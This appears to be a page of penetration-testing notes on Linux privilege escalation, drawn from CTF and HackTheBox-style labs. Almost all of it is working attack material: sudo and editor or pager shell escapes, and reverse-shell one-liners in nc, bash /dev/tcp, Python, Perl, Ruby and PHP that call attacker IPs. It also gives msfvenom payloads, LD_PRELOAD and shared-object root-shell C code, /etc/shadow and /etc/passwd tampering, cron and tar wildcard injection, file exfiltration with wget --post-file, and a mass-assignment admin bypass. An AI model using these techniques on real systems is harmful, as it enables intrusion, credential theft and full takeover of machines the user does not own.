3 PrivEsc

Every PrivEsc comes from a misconfiguration or Vulnerability

Enumerate

  • Most are found using Enums

> lse.sh -l 1 -i
> curl $MyIP:8000/LinEnum.sh | bash

REF: KernelExploits (ex: Dirty Cow)

GTFOBins

sudo -l

  • ALWAYS check the sudo rights to see if you can PrivEsc

  • Find sudo allowed commands w/o password

  • If you can execute as somebody else.. get their shell !!!

  • If you can update the script, point it back

  • REF: NC/Alligator

sudo -l
sudo myapp
sudo -u victim myapp
sudo -u victim ls -lah /home/user
sudo -u victim /bin/bash 
sudo -u victim find /home/victim/key.txt -exec cat {} \;

echo 'nc -e 10.x.x.x 4444' > ./monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f' > monitor.sh
chmod +x ./monitor.sh
nc -nvlp 4444
sudo ./monitor.sh

Password Reuse

Configs, Backups, Docs, ssh keys, Scripts, Service ..if you find a password, reuse it!!

  • /user/home

  • /tmp

  • /var/backups

  • /.ssh

  • /myvpn.ovpn

  • /etc/openvpn/auth.txt

  • /scripts

  • ~/bash.history, nano.history, mysql.history

> ls -a cat .*history
Passwords are often re-used for root

PrivEsc Class

Editor Escapes

  • vim, ed, ne, nano, pico

  • Some of these shells provide third party command execution

  • Editors like “vim” provide us a well known techniques to bypass shell restrictions.

  • Vim has a feature which allow us to run scripts and commands inside it.

--------------------
>> sudo -l
>> sudo -u victim vim

:r /home/victim/key.txt   ..to read the file over vim
:!/bin/bash               ..to spawn bash .. over vim

--------------------
sudo vi /var/test
:!/bin/bash
whoami
root

--------------------
sudo vi /var/test vi -c ':!/bin/sh' /dev/null

---------------------
vim
:!/bin/ls -l .b*

Vim will get you out of the editor and execute: ls -l .b*
Showing all /etc files with names beginning in a letter .b

vim
:set shell=/bin/sh
:shell

vim
:!/bin/sh



---------------------
ed
Simple editor with not many features that could compromise the system, but still it also has third party command execution features inside, very similar to vim.
Once inside ed we can escape the normal shell by executing
We managed to get out of lshell and execute commands we were not allowed before.

ed
!’/bin/sh’

== ==== ==
ne

Minimal and modern replacement for vi. 
As you can see inside lshell we have no permission to go back to “/” 
or any other directory above ours.
ne editor has a very interesting feature that allow us to save or load configuration preferences. We can abuse this feature to read contents in the file system. 

ne
ESC 
Main configuration menu
“Prefs” menu
“Load Prefs”
Open any file you want.. even: /etc/passwd 


--------------------
awk
If you can get 'awk' as as another user..

1. AWK Operations:
(a) Scans a file line by line
(b) Splits each input line into fields
(c) Compares input line/fields to pattern
(d) Performs action(s) on matched lines

awk '{print}' employee.txt
awk '/manager/ {print}' employee.txt 
awk '{print $1,$4}' employee.txt 
awk '{print NR,$0}' employee.txt    ..NR will show line numbers too

>> sudo -u victim awk '{print}' /home/victim/key.txt   ..to view files!
>> sudo -u victim awk 'BEGIN {system("/bin/bash")}'    ..to spawn bash!

Other Escapes

find Escape

  • Find has an '-exec' option

---------------------
This will look for a fake file
But also execute a pipe to commands

But will only execute commands allowed to user
works for: rbash, rzsh, rksh
But not  : lshell

> find . -name test.php -exec awk 'BEGIN {system("cd /root; ls")}' \;

---------------------
find copy command to get root-shell

> sudo find . -exec /bin/sh \; -quit

Pager Escapes

--------------------
less
If you can get 'less' as as another user..
You can read files...
>> sudo -l
>> sudo -u victim less /home/victim/key.txt
!/bin/bash     ..to spawn bash .. out of less !!!


--------------------
more

Open a big file with  'less' or 'more' to get paging
Then try and break out with a shell command:
>> less .bashrc
!'sh'
$  ... win!!!

--------------------
man
we can use man too, b/c it utilizes less/more as pager
>> man ls
!'sh'
$  ... win!!!

--------------------
pinfo
>> pinfo ls
!  .. will let us run commands!
! ls /etc
! nc -h
! nc 192.168.0.21 5000 -e /bin/bash

And listen on host with:
nc -lvp 5000

nc escape

nc
“Network Swiss Army Knife”
Creative use of nc pipes a session to host

rm -f /tmp/f; 
mkfifo /tmp/f; 
cat /tmp/f | /bin/sh -i 2>&1 | nc -l 192.168.0.21 5000 > /tmp/f”
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 192.168.0.21 5000 > /tmp/f”

echo 'nc -e 10.x.x.x 4444' > ./monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f' > monitor.sh
chmod +x ./monitor.sh
nc -nvlp 4444
sudo ./monitor.sh
Connect!

1 force delete /tmp/f
2. fifo is similiar to a pipe, used by multiple procs for read/write
3. Opens fifo
...Send contents to interactive shell
...Discards errors
...Pipe results as rev shell to nc\remote 
...(victim is listening for a shell)
...(connect with host, and get a shell)

This kind of reverse shell technique will only work...
if the restricted shell allows redirect and escape characters.

chown/chmod

  • An over-powered-hack of root, but works!

sudo -l
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown

sudo chmod -R 755 /root
cd /root
cat root.txt

sudo chown root:myuser /root/root.txt
cat /root/root.txt

nmap escape

sudo -l
(root) NOPASSWD: /usr/bin/nmap

sudo nmap --interactive
nmap> !sh

tmux escape

  • Found an active tmux session owned by root?

  • valentineHTB - Was this left wide open to share with devs?

/usr/bin/tmux -S /.devs/dev_sess     ..Found by: .bash_history & LinEnum.sh

> tmux -S /.devs/dev_sess            ..Jump right in!

Console Browsers

  • links, lynx, elinks

----------------
links
open website like google.com (since it has a text-box)
'ESC' to get config menu
File > OS Shell

----------------
lynx .. to google.com
'o' for options
change 'Editor' path to /usr/bin/vim
Accept changes
google.com > cursor to search-box
'e' to edit content (as we just setup)
vim will now load
:!/bin/sh  ..to try and escape!!

Shortcut:
>> lynx --editor=/usr/bin/vim www.google.com

----------------
elinks
Set the Editor to use vim
export EDITOR=/usr/bin/vim
google.com (w/text box)
Cursor to text-box > ENTER and F4
vim will open!!
:!/bin/sh  ..to try and escape!!

----------------
mutt
mutt is a Linux console email reader
>> mutt
!       .. for a shell command
/bin/sh .. to escape

Python read file

> sudo -u victim python

-----------------------------
> import os
> print os.system('uname')
> print os.system('cat \home\victim\key.txt')
> print(open('/home/victim/key.txt').read())

-----------------------------
> from subprocess import call
> call(['cat','/home/victim/key.txt'])

Python rootbash

#!/usr/bin/env python
import os
import sys
try:
    #os.system('/usr/bin/touch /tmp/hello')            ..test
    #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1')     ..reverse
    #os.system('chmod 4755 /bin/bash')                 ..bash
    os.system('cp /bin/bash /tmp/rootbash; chown root:root /tmp/rootbash; chmod +s /tmp/rootbash')
                                                       ..rootbash
except:
     sys.exit()

Programming Escapes

------------------
awk 'BEGIN {system("/bin/sh")}'

expect
.. spawn sh
.. sh

expect -c 'spash sh' -i
.. sh

------------------
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


------------------
ruby (interactive ruby shell)

>> irb
irb: exec '/bin/sh'

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

------------------
perl -e 'system("sh -i");'  ..system method
perl -e 'exec("sh -i");'    ..exec method
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


------------------
php -a   ..interactive
php> exec("sh -i");

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
if you have trouble using 3, try file-descriptor 4,5,6,etc

Sudo Error Read

  • If you can sudo apache2

  • You might be able to make it read something private

  • Even if it errors, you may still read the file!

> sudo -l
/usr/sbin/apache2

> sudo apache2 -f /etc/shadow
Error, but reads anyway!!

Perms

  • owner:group:world

  • user:groups:directories

    • /etc/passwd

    • /etc/shadow

  • root UID:0

  • /etc/group

    • primary:secondary groups

    • primary by default is 'same' as username

  • read:write:execute

  • dir perms:

    • execute:to allow enter

    • read:list contents

    • write:files and sub can be created

Special perms

  • setuid bit (suid) - exec as file owner

  • setgid bit (sgid) - file exec w/priv of group

    • or: folder files created within get privs of dir-grp

View perms

ls -l /bin/date -rwx r-x r-x

Users have 3 ids

real:effective:saved read: who they actually are efct: whoami will reveal savd: suid can temp switch back-forth

id ..print id/gp of user 
cat /proc/$$/status | grep "[UG]id"

Spawn a Root Shell

  • copy /bin/bash

  • rename to rootbash owned by root user, with SUID bit set

  • rootbash -p

Root Shell: Bash

  • sudo -l

  • If you find something to update/execute as root

  • Tweak it to give you a quick shell:

#!/usr/bin/bash
su

Copy Bash

  • A few years ago, you could exploit this configuration issue by copying a shell

  • (bash a long time ago and ksh more recently)

  • [Un]fortunately most shells will now prevent this attack.

--------------------
> sudo -u victim cp /bin/bash /tmp/foo
> sudo -u victim chmod +xs /tmp/foo

.. heres a workaround:

--------------------
sudo: cp and chmod

Create the 'cat key' with vi
Compile it, copy it with sudo (so it will be owned by victim)
Once you copied it, you should be able to 
set the setuid and setgid flags on it using:

>> vi /tmp/catch.c
int main(void)
{system("cat /home/victim/key.txt");}

>> gcc catch.c -o catch
>> sudo -u victim chmod +xs catch  .. not permitted
>> sudo -u victim cp catch ./catch2
>> sudo -u victim chmod +xs catch2
>> catch2

Root Shell: C

root process executes another process C code to compile that will spawn a bash-root-shell

int main() { 
    setuid(0);
    system("/bin/bash -p");
}
> gcc -o name filename.c

Root Shell: SUID

REF: Crontab PATH

-----------------------
> vim /home/user/overwrite.sh
> chmod +x /home/user/overwrite.sh

-----------------------
#!/bin/bash
cp /bin/bash /tmp/rootbash   #new bash
chmod +s /tmp/rootbash       #setuid bit for root!

-----------------------
> watch -n 1 ls -l /tmp     ..watch new bash appear
> /tmp/rootbash -p          ..root!

rootbash

echo -e '#!/bin/bash' > /tmp/update > /tmp/update
echo -e 'cp /bin/bash /tmp/rootbash' >> /tmp/update
echo -e 'chmod +s /tmp/rootbash' >> /tmp/update
chmod +x /tmp/update
./rootbash -p   ...after created! got root!

Root Shell: service

REF: Path Environment Variables

vim service.c

-------------------------
int main() {
    setuid(0);
    system("/bin/bash -p");
}

-------------------------
gcc -o service service.c

Root Shell: function

REF: Abusing Old Bash

/bin/sh --version   ..< 4.2-048

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

Root Shell: SO

REF: Shared Object Injection

#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
   setuid(0);
   system("/bin/bash -p");
}

Reverse Shells

Reverse Shell Generator: Suggestion Tool

More Rev Shells:

Reverse Shell: msfvenom

> msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.51.1 LPORT=53 -f elf > shell.elf 
Catch with netcat or MSF multi-handler

Reverse Shell: perl

sudo -l ../usr/bin/perl
sudo perl -e 'use Socket;$i="10.10.14.52";$p=4646;socket\(S,PF\_INET,SOCK\_STREAM,getprotobyname\("tcp"\)\);if\(connect\(S,sockaddr\_in\($p,inet\_aton\($i\)\)\)\){open\(STDIN,"&gt;&S"\);open\(STDOUT,"&gt;&S"\);open\(STDERR,"&gt;&S"\);exec\("/bin/sh -i"\);};'
nc -nvlp 4646 whoami root!

Service Exploits

  • Find apps running with root:

  • Get the Version

  • Search Google, searchsploit, github, exploitdb

ps aux | grep "^root"

myapp --version
myapp -v
dpkg -l | grep myapp
rpm -qa | grep myapp

MySql

lse-sh -l 1 -i
Found mysl running as root
Can we connect without password? Yes!

mysqld --version   ..v5.1.73

dl exploit code: 
> vim raptor_udf2.c   ..view instructions
> gcc -g -c raptor udf2.c -fPIC  ..for 64bit
> gcc -g -shared ... creates a shared-object for exploit

Connect:
mysql -u root -p
create table ...
insert ...
select dumpfile...
create function...
select * from mysql.func;
select do_system...id/in/out/chown/etc
select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
exit
/tmp/rootbash -p
id  ..root!
win!!

Port Forward Localhost

  • Setting a service on localhost does not make it secure!

  • We can port-forward our no-password-mysql over to my kali

  • Send target localhost:3306 connection over to kali:4444

VulnMachine:
> netstat -nl  ..3306 mysql listening on localhost-only
> ssh -R 4444:127.0.0.1:3306 root@192.168.1.26(kali)

Kali:
> mysql -u root -h 127.0.0.1 -P 4444
> select @@hostname  ..debian!!

shadow

  • If we can read - then we can crack

  • If we can write - then we can update

--------------------------
Lab
> lse.sh -i   ..found shadow is readable/writeable

--------------------------
Readable:
> ls -l /etc/shadow
rw- r-- rw-
$6$ ..sha512

Copy hash to local and crack
> john --format=sha512crypt --wordlist=rockyou.txt hash.txt
password123
> su
whoami ..root!

--------------------------
Writeable:
> cp /etc/shadow /home/user/shadowbackup
> mkpasswd -m sha-512 newpassword  ..create a new hash
> vim /etc/shadow  ..update root hash
su  ..newpassword
id  ..root!!

passwd

  • /etc/passwd - used to have hashes for backward-compatibility

  • If 2nd field is hash it will take precedence over hash in shadow

  • Writeable: We can update to a known hash in passwd, or delete it

--------------------------
Writeable:
> lse.sh -l 1 -i   ..passwd writeable
> ls -l /etc/passwd
rw- r-- rw-

Try deleting the x to create 'no password'
> root:x:0:0:root:/root:....
> root::0:0:root:/root:....

Set a new pass:
> openssl passwd "password" ..a new hash to use
dRCtCEMlsFRnA2  
> vim /etc/passwd
root:dRCtCEMlsFRnA2:0:0:root:/root:...
su
password
id ..root!

--------------------------
Appendable:
Add new user with UID:0 
> vim /etc/passwd
> newroot:dRCtCEMlsFRnA2:0:0:root:/root:...
su newroot
id ..root!

Environment Variables

  • Apps using sudo can inherit env-vars

  • /etc/sudoers config

  • env_reset ..runs in minimal

  • env env_keep ..runs keeping with vars

LD_PRELOAD

Can be set to path of shared obj (.so)

  1. Make a custom shared-object

  2. Create init() to exec

  3. Wont work if real user ID is diff from effective uid

  4. sudo must be configured to preserve LD_PRELOAD with env_keep

--------------------
sudo -l
env_reset, env_keep=+LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

--------------------
vim preload.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
   unsetenv("LD_PRELOAD");
   setresuid(0,0,0);
   system("/bin/bash -p");
}

--------------------
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
sudo LD_PRELOAD=/tmp/preload.so find
root!!!

LD_LIBRARY_PATH

Kinda like DLL Injection for Linux

> sudo -l
keep_env+=LD_LIBRARY_PATH

> ldd /usr/sbin/apache2
Prints shared libraries used by apache2
Found: libcrypt.so.1

We can create our own library instead!

--------------------
vim library_path.c

#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
   unsetenv("LD_LIBRARY_PATH");
   setresuid(0,0,0);
   system("/bin/bash -p");
}

--------------------
Compile this to a shared library w/same name!
> gcc -o libcrypt.so.1 -shared -fPIC library_path.c

--------------------
Set library path to current-dir
Execute the apache2, with 'our trick-library'
> sudo LD_LIBRARY_PATH=. apache2
root!!!

Crons

  • Cron job running with root is a good target

  • If perms are misconfigured you can use it to get reverse-shell w/root privs

User crontabs:

  • /var/spool/cron/

  • /var/spool/cron/crontabs/

Systemwide:

  • /etc/crontab

> lse.sh -l 1 -i   ..crontab found!!

> cat /etc/crontab
found 'overwrite.sh'
locate overwrite.sh

> ls -l /user/local/bin/overwrite.sh
writeable!!
Update the script
> bash -i >& /dev/tcp/192.168.1.26/53 0>&1

listener:
> nc -nvlp 53
When job kicks off, you will connect as root!

Cron Script (Python)

  • Found a scheduled job that runs as root, and you can edit the file?

-------------
find / -user root -writable -type f -not -path "/proc/*"  2>/dev/null
/opt/tmp.py   ..job runs with root

-------------
vim script.py           ..Prep this locally
#!/usr/bin/env python
import os
import sys
try:
    os.system('nc 10.x.x.x 5555')
    os.system('nc -e /bin/bash 10.x.x.x 5555')
    os.system('bash -i >& /dev/tcp/10.x.x.x/5555 0>&1')
    os.system('cp /bin/bash /tmp/rootbash; chown root:root /tmp/rootbash; chmod +s /tmp/rootbash')
except:
     sys.exit()

-------------
python -m SimpleHTTPServer 80                     ..share it
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l and overwrite

-------------
nc -nvlp 5555    ..listen and wait for execution
whoami           ..root

Crontab PATH

  • Write to path in cron job

  • We cant update the cron, but we might be able to trick it.

    • If it is not using absolute path

    • If the path is writeable

  • Default: /usr/bin:/bin

  • Example: /home/user .. is in path and writeable

-------------------------
> lse.sh -l 1 -i    ..found writeable!
> cat /etc/crontab
PATH=/home/user:/usr/local/sbin:/usr/local/bin
* * * * * root overwrite.sh

Woops, Not absolute path!
First in path: /home/user
It is writeable

-------------------------
> vim /home/user/overwrite.sh
> chmod +x /home/user/overwrite.sh

#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash

> watch -n 1 ls -l /tmp  ..watch new bash appear

> /tmp/rootbash -p
root!!

Wildcard tar touch checkpoint

  • Using * in a command shell will perform filename expansion aka: "Globbing"

  • Space-separated list of file/dir names in curr dir

  • touch can create a checkpoint that will execute

  • tar is using * and will run the checkpoint action

  • gtfobins/tar

  • TarBackups

-------------------------
Demo:
echo *
ls *
touch ./-l
ls *

--help
--option=key=value

-------------------------
Make a checkpoint action that executes our rev-shell
This works b/c of the wildcard in the tar command

cat /etc/crontab
* * * * * root /usr/local/bin/compress.sh

-------------------------
cat /usr/local/bin/compress.sh

#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

tar is using * and we can exploit this!

-------------------------
Plant our exploit:

Reverse shell binary
> msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf -o shell.elf

Target home dir:
copied binary to home dir
shell.elf

-------------------------
Create checkpoint for every file processed and Define Action
touch ./--checkpoint=1
touch ./ checkpoint action=exec=shell.elf

-------------------------
local:
nc -nvlp 53
root!!

SUID/SGID

  • SUID files executed with owner privs

  • SGID files executed with group privs

  • Apps might add SUID files

  • Search with searchsploit, google, github

--------------------
ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 54192 Nov 18 2015 /usr/bin/passwd
   |
  setuid bit .. so that you can run passwd as root (to change your pw)
  
  
--------------------
Find Uncommon setuid binary
> lse.sh -i

Search SUID/SGID files:
> find / -type f -a \(-perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
> find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

/usr/sbin/exim-4.84-3 --version
searchsploit exim 4.84-3

Copy exploit '39535.sh' to target
./39535.sh
error '/bin/sh^M' bad interpreter: No such file or directory
problem: Windows New Line Character

sed to fix:
sed -i -e "s/^M//" 39535.sh
./39535.sh
root!

Perl

  • Note: backticks keep the priority last.. so you can sudo first!

> sudo -u victim perl -e 'print `cat /home/victim/key.txt`'

Open Bash and copy the Key:
> sudo -u victim perl -e '`/bin/bash`'   ..bash is limited, no results!
> cp /home/victim/key.txt /tmp/.key      ..copy the key
> chmod 777 /tmp/.key                    ..access to all
> exit
> cat /tmp/.key   !!!

Ruby

> sudo -u victim ruby -e 'puts `uname`'
> sudo -u victim ruby -e 'puts `cat /home/victim/key.txt`'

Ruby commandline (irb):
>> sudo -u victim ruby -e 'require "irb"; IRB.start(__FILE__)'
irb>> puts `cat /home/victim/key.txt`

Node

  • If you can get 'node' as as another user..

  • Execute this Javascript using node:

sudo -u victim node -e '

	var exec = require("child_process").exec;
	exec("cat /home/victim/key.txt", function (error, stdOut, stdErr) {
	console.log(stdOut);
	});
'

Shared Object Injection

  • strace - track system calls

  • Ex: strace myapp

  • App is trying to execute a missing "Shared Object"

  • We can create our own evil SO

-------------------------
Finds suid bit set
> lse -l 1 -i

Search SUID/SGID files
find / -type f -a \(-perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

ls -l /usr/local/bin/suid-so
/usr/local/bin/suid-so  ..execute seems to work

-------------------------
> strace myapp 2>&1 | grep -iE "open|access|no such file"
open("/home/user/.config/libcalc.so" ENOENT (No such file or dir)
> vim /home/user/.config/libcalc.c

#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
   setuid(0);
   system("/bin/bash -p");
}

> gcc -shared -fPIC -o libcalc.so libsalc.c
> myapp

Path Environment Variable:

Exploit hunting:

strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <command>

Find SUID/SGID files:

find / -type f -a \(-perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/bin/kick          ..execs w/root perms suid, tries to start apache2httpd
strings /usr/bin/kick  ..found 'service apache2 start'
strace -v -f -e execve /usr/bin/kick 2>&1 | grep service

Found 'service apache2 start' 
Vulnerable since it tries to run 'service' without a full path

Exploit: This will run 'service' from path instead of the 'real' command

-------------------------
vim service.c

-------------------------
int main() {
    setuid(0);
    system("/bin/bash -p");
}

-------------------------
gcc -o service service.c

-------------------------
Add current directory to our Environment PATH

> PATH=.:$PATH
> PATH=.:$PATH /usr/bin/kick
root!

Bash Functions

  • Old bash can define an evil function that can pop a shell

  • This is "Defining Bash Functions with Precedence"

  • Bash < 4.2-048

  • Could define user functions w/absolute path

  • Functions could be exported and get precedence

  • New Scenario has Full Path (which is better)

-------------------------
strace -v -f -e execve /usr/local/bin/suid-env2 2>&1 | grep service
Found '/usr/sbin/service apache2 start"

/bin/sh --version   ..< 4.2-048

-------------------------
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

-------------------------
/usr/local/bin/kick
root!!

Bash PS4 Debug

  • Inject a command to Bash Debug PS4 Prompt

  • Bash < 4.2-048

  • SHELLOPTS environment variable with xtrace

  • debugging mode -x

  • Can set SHELLOPTS with 'env' command

env -i SHELLOPTS=xtrace PS4='<test>' /usr/bin/myapp
env -i SHELLOPTS=xtrace PS4='$(whoami)' /usr/myapp
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +x /tmp/rootbash)' /usr/bin/myapp
/tmp/rootbash -p
root!!

SSH Keys

Found ssh private key! Are root logins allowed?

grep PermitRootLogin /etc/sshd_config

vim root_key
chmod 600 root_key

ssh -i root_key root@192.x.x.x
connected!

NFS Root Squashing

  • Network File System

  • Send a rootbash over NFS with local root impersonating remote root

  • Only works if "no_root_squash" is setup

  • Remote users can: mount/access/create/modify files

  • Default: Created files inherit remote user/group ID

  • Even if not on the NFS server

  • How NFS protects obvious privesc

  • If remote user claims to be root uid=0

  • NFS will squash and treat as a nobody

  • Feature can be disabled!

  • REF: TarBackups

-------------------------
showmount -e <tgt>
nmap -sV -script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>

-------------------------
lse.sh -l 2 -i   ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)

-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

-------------------------
Target:
ls -l /tmp       ..owned by root, with suid
/tmp/shell.elf   ..executed as root
root!!

wget

REF: SundayHTB

wget (download)

If you can sudo wget.. you can write anywhere as root!
> sudo wget 10.10.14.52/shell.py -o /root/troll  

--------------------------
--------------------------
wget (upload)

Pro-tip: you can upload with wget too!
> nc -nvlp 4444
> sudo wget --post-file=/root/flag.txt 10.10.14.52:4444
connected to [10.10.14.52]
flag !!!

chkrootkit

--------------
#!/bin/bash
php -r '$sock=fsockopen("$MyIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

After schedule runs the job:
nc -nlvp 4444
connected!

--------------
rootbash:
echo -e '#!/bin/bash' > /tmp/update
echo -e 'cp /bin/bash /tmp/rootbash' >> /tmp/update
echo -e 'chmod +s /tmp/rootbash' >> /tmp/update
chmod +x /tmp/update
./rootbash -p   ...after created! got root!

ORM

  • Makes things easier to program.

  • But sometimes you can slip-in extras to the authentication to get in!

  • Object-relational mapping (ORM) to easily query the database without any SQL knowledge.

Ruby (using ActiveRecord)
You can do things like:

@user = User.find_by_name('myuser')    .. to execute query and get user object results
@user = User.create(myhash)      ..or automatically create and update an object from a hash
@user.update_attributes(anotherhash)

Burp intercept found:
Proxy > Intercept > ON
Proxy > Intercept > Raw > Forward (after editing)

user%5Busername%5D=test&user%5Bpassword%5D=test&submit=Submit+Query
user[username]=test&user[password]=test&submit=Submit Query     ..url decoded
user[username]=test&user[password]=test&submit=Submit Query&user[admin]=true  ..got admin!!
user[username]=test&user[password]=test&submit=Submit Query&user[admin]=1     ..got admin!!

Add the Admin 'organization" too:
user.organisation_id = 1
user[username]=test&user[password]=test&submit=Submit Query&user[organisation_id]=1
user%5Busername%5D=test&user%5Bpassword%5D=test&submit=Submit+Query&user%5Borganisation_id%5D=1
Previous2 EnumsNext4 Kernel Exploits

Last updated